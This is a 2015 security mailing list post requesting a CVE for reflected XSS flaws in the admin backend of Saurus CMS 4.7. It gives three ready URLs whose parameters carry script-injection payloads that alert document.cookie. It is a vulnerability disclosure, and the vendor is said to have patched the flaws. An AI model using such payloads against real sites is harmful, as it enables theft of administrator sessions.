Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Wed, 28 Jan 2015 05:50:26 +0100
From: Steffen Rösemann <steffen.roesemann1986@...il.com>
To: oss-security@...ts.openwall.com
Subject: CVE-Request -- Saurus CMS v.4.7 (Community Edition, released:
 12.08.2014) -- Multiple reflecting XSS vulnerabilities

Hi Josh, Steve, vendors, list.

I found multiple reflecting XSS vulnerabilities in the administrative
backend of the content management system Saurus CMS v. 4.7 (Community
Edition, released: 12.08.2014).

The parameters used in the following PHP files are prone to reflecting XSS
attacks (including exploit examples):

user_management.php (vulnerable parameter: "search"):

http://
{TARGET}/admin/user_management.php?tmpuser_search=1&tmpgroup_search=1&tmpsearch_subtree=1&search=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3C!--&user_search=1&group_search=1&group_search=1&flt_role=&keepThis=true&id=&op=&keel=&group_id=1&view=overview_false&user_id=&user_prev_id=&user_next_id=

profile_data.php (vulnerable parameter: "data_search"):

http://
{TARGET}/admin/profile_data.php?data_search=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3C!--&profile_search=&profile_id=0

error_log.php (vulnerable parameter: "filter"):

http://
{TARGET}/admin/error_log.php?id=&op=&keel=&group_id=1&otsi=1&page=&filter=bla&algus=31.12.2014&lopp=07.01.2015&err_type=&otsi=1&page=&filter=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E%3C!--&algus=31.12.2014&lopp=07.01.2015&err_type=

Vendor patched this vulnerability in the latest commit of Saurus CMS v. 4.7
(CE, released: 27.01.2015).

Could you please assign a CVE-ID for this?

Thank you very much!

Greetings from Germany.

Steffen Rösemann

References:

[1] http://www.saurus.info
[2] https://github.com/sauruscms/Saurus-CMS-Community-Edition/issues/61
[3] http://sroesemann.blogspot.de/2015/01/sroeadv-2015-05.html
[4]
https://github.com/sauruscms/Saurus-CMS-Community-Edition/commit/8dec044d0fdabcb9b04e58037623385a97b0d288
[5]
http://sroesemann.blogspot.de/2015/01/report-for-advisory-sroeadv-2015-05.html
[6] http://seclists.org/fulldisclosure/2015/Jan/112

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.